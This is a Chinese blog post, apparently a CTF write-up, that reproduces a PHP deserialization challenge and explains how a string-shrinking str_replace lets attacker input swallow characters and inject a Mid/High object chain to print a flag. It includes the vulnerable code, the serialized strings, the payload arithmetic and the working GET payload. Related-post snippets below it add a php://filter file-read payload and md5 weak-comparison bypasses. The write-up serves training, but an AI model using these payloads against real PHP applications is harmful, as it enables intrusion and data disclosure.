海河工匠杯决赛

最新推荐文章于 2023-07-24 20:48:37 发布
最新推荐文章于 2023-07-24 20:48:37 发布
阅读量871 收藏 4
点赞数 1
分类专栏: CTF赛题复现 文章标签: PHP反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/121205542
版权

一道字符串减少的反序列化题目,以前没有遇到过,结果在这里被制裁了,复现一下。增加姿势

注意吞掉这个词

题目


<?php @include 'common_ui.inc';?>
<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a, $b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __destruct(){
        $high = 'nice,'.$this->mid;
        echo $high;
    }
}

class High{
    public $high;
    function __toString(){
        //flag.php
        include "flag.php";
        if($this->high=='flag.php')
        {
            echo $flag;
            echo "<br/>";
        }
        return 'good job';
    }
}
if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    echo "<br>";
}
else
{
    highlight_file("./test0.php");
}

?>

分析

可以发现,我们要想得到flag,靠的是High类的__toString()方法

class High{
    public $high;
    function __toString(){
        //flag.php
        include "flag.php";
        if($this->high=='flag.php')
        {
            echo $flag;
            echo "<br/>";
        }
        return 'good job';
    }
}

只要我们将$this->high变量在反序列化的时候赋值成flag.php时即可输出flag了。

要想调用__toString()方法,就得找到一个能将类High输出的地方。发现在这个地方

class Mid{
    public $mid;
    function __destruct(){
        $high = 'nice,'.$this->mid;
        echo $high;
    }
}

当我们把$this->mid在反序列化的时候赋值为new High()即可。

总体思路就这么简单,我们回到代码开始的地方

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    echo "<br>";
}
else
{
    highlight_file("./test0.php");
}

题目要求我们GET输入a和b的值,作为实例化Low这个对象的参数。

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a, $b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

即赋值给user1和user2。

第二步在反序列化的时候会对序列化之后的字符串进行处理,将'******'替换为chr(0).'$'。注意

这里chr(0).'$'是两个字符,只是chr(0)不可见。

首先看看我们序列化字符串的样式

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

结果:

O:3:"Low":2:{s:5:"user1";s:9:"new Mid()";s:5:"user2";s:10:"new High()";}

可以看到,因为我们是通过$_GET输入的,所以输入的数据为字符串类型。我们能够控制的地方就是new Mid()和new High()两处。

而我们想要的序列化结果为:

这里因为是前面吞掉后面的字符,所以是将user2赋值为new Mid()

<?php
class Low{
    public $user1;
    public $user2;
    function __construct(){
        $this->user1 = 'xxx';
        $this->user2 = new Mid();
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

结果:

O:3:"Low":2:{s:5:"user1";s:3:"xxx";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}

可以看到,我们将user2其中一个赋值为类Mid

即(重要代码,后面会用到)

s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}

那么就可以通过Mid的__construct()方法实例化类High,然后调用High的__destruct()方法,成功得到flag。

注意:前面为字符串,后面为对象时是有个分号;分开的。即s:3:"xxx"与s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}之间有个分号隔开的,所以待会处理的时候要注意

但是因为我们传入的数据会被作为字符串处理,没法直接传入上述数据。

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

 注意:因为前面说了两者之间有个;隔开,所以在给b传值时候需要在重要代码前加一个;

结果:

O:3:"Low":2:{s:5:"user1";s:3:"xxx";s:5:"user2";s:79:";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

可以看见,传入的数据都作为字符串扩起来了

那么应该怎么做呢?吞掉

可以看见在反序列化之后还有一个字符串替换函数

str_replace('******', chr(0) . '$' , serialize($a))

这串代码,表示每6个*会替换成两个字符。那么就会吞掉后面4个字符

如果我们对a传入n个*,user1的结果就会变成

O:3:"Low":2:{s:5:"user1";s:n:"n个*";s:5:"user2";s:79:";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

经过替换后,*的个数少于n,那么就会继续吞掉后面的字符,当到达一个程度后,会把后面的

";s:5:"user2";s:79:
//19个字符

19个字符全部吞掉,后面的一个"与前面的一个"形成闭合。剩下

;s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

这样user2的结果就是一个Mid类了。

如何算需要多少个*呢?

我们这样想,每6个*替换成2两个字符,就会吞掉4个字符,总共需要吞掉19个字符,但是19除4是除不尽的,所以我们还要在给b传值时候在多加一个字符;因为需要再吞一个字符就会把后面的" 吞掉,为了闭合,我们多加一个" (以后推荐要多加字符的时候,全部用")

那么现在就需要吞掉20个字符了,每6个*替换成2两个字符,吞掉4个字符。6个*为一组,一组能吞掉4个字符,需要20➗4=5组,所以我们需要(20➗4)✖️6=5✖️6=30个*

payload:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

我们加上字符串替换函数看看:

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    var_dump($b);
}
else
{
    highlight_file("./test0.php");
}

?>

传值:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

结果:

 

 成功将user2污染为Mid()类对象。

payload:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

结果:

_Monica_
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
2020-09-03签到赛
Kihyun_的博客
09-03 245
super_easy_web1P1P依旧开心哈哈哈Very_Ez_Unserialize super_easy_web <?php highlight_file('index.php'); include('flag.php'); //try to reach the flag in variable if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'].
PHP中MD5函数漏洞
05-07 705
题目描述 一个网页,不妨设URL为http://haha.com,打开之后是这样的 if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) { if (md5($_GET['a']) === md5($_GET['b'])) { echo ('...
php实现弱类型,PHP弱类型详解
weixin_35763513的博客
03-10 385
最近做ctf题目会经常碰到PHP弱类型的题目,本文主要和大家分享PHP弱类型总结,希望能帮助到大家。知识介绍:php中有两种比较的符号 == 与 ===1 、观察上述代码,"admin"==0 比较的时候,会将admin转化成数值,强制转化,由于admin是字符串,转化的结果是0自然和0相等。2 、"1admin"==1 比较的时候会将1admin转化成数值,结果为1,而“admin1“==1 却...
攻防世界 Web simple_php 简单php弱类型题
Rashu99's blog
06-11 657
$ a=@$_GET[‘a’]; 中的@是为了防止没有 $_GET[‘a’]出现错误提示. 一般都用 isset() 来判断一下 $a = isset($_GET['a']) ? $_GET['a'] : null ; 预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。 从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送信息的量也有限制。 is_numeric() 函数用于检测变量是否为数字或数字字符串。 php弱类型比较 = .
工匠-CTF(题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠比赛的三道题目和exp,并详细写出了解题思路。
海河流域矢量
09-10
海河流域矢量,shpfile格式,可用于各种地理信息软件。
天津结构海河汇报材料(PPT).pdf
10-11
天津结构海河汇报材料(PPT).pdf
全国水系kmz数据-海河流域
06-03
海河流域的kmz数据,包括干流、支流,涵盖流域内的所有河流,各河流均有属性,不像好多shp水系数据只有流线而没有属性名称
论文研究 - 2005-2017年海河流域水质趋势分析
05-24
海河是中国七大河流之一。 海河流域水污染问题严重。 海河流域的水质一般在北部最好,在南部最差。 其中the河水质最好,I-III比例约60%,图海马家河水质最差,> V比例超过60%。 从水质变化趋势看,山东省在图海...
南邮 CTF平台部分 write up
qq_42863361的博客
08-02 1882
南邮 CTF部分 write up web md5 collision 看源代码
弱类型比较
m0_74317362的博客
07-24 110
弱类型比较
php get a get b,[CTF]CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过
weixin_42540248的博客
03-23 897
0X00 摘要CTF中md5判等可使用0e绕过,但是如果是双md5该如何绕过呢?本文将教你如何绕过md5(md5($_GET[‘a’])) == md5($_GET[b’])。0X01 引言在php中,所有变量都是若类型的,在使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位相等,比如下面的例子。if (isset($_GET['a']) && isset(...
PHP 代码注入知识点总结
千寻的博客
02-10 2088
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
php的md5函数漏洞,PHP中MD5函数漏洞
weixin_33347467的博客
03-27 811
题目描述一个网页,不妨设URL为http://haha.com,打开之后是这样的if (isset($_GET['a']) and isset($_GET['b'])) {if ($_GET['a'] != $_GET['b']) {if (md5($_GET['a']) === md5($_GET['b'])) {echo ('Flag: '.$flag);}else {echo 'Wrong....
web入门-文件包含
wo41ge的博客
11-28 3264
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
php中绕过md5检验
sinat_41380394的博客
08-21 2257
&lt;?php if(isset($_GET['v1']) &amp;&amp; isset($_GET['v2']) &amp;&amp; isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 &amp;&amp; md5($v1)...
ctfshow(卷王)
qq_62046696的博客
09-24 1465
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
南邮CTF--bypass again
weixin_34288121的博客
05-18 486
南邮CTF--bypass again 提示:依旧弱类型,来源hctf 解析: 源代码: if (isset($_GET['a']) and isset($_GET['b'])) {​ if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag)...
海河流域 kmz kml
最新发布
10-06
海河流域是中国北方的一个重要河流流域,位于河北、山西、内蒙古、北京和天津等地。KMZ和KML是谷歌地球软件中的文件格式,可以用于表示地理信息数据。 KMZ是一种压缩格式,可以将多个地理信息数据文件压缩成一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值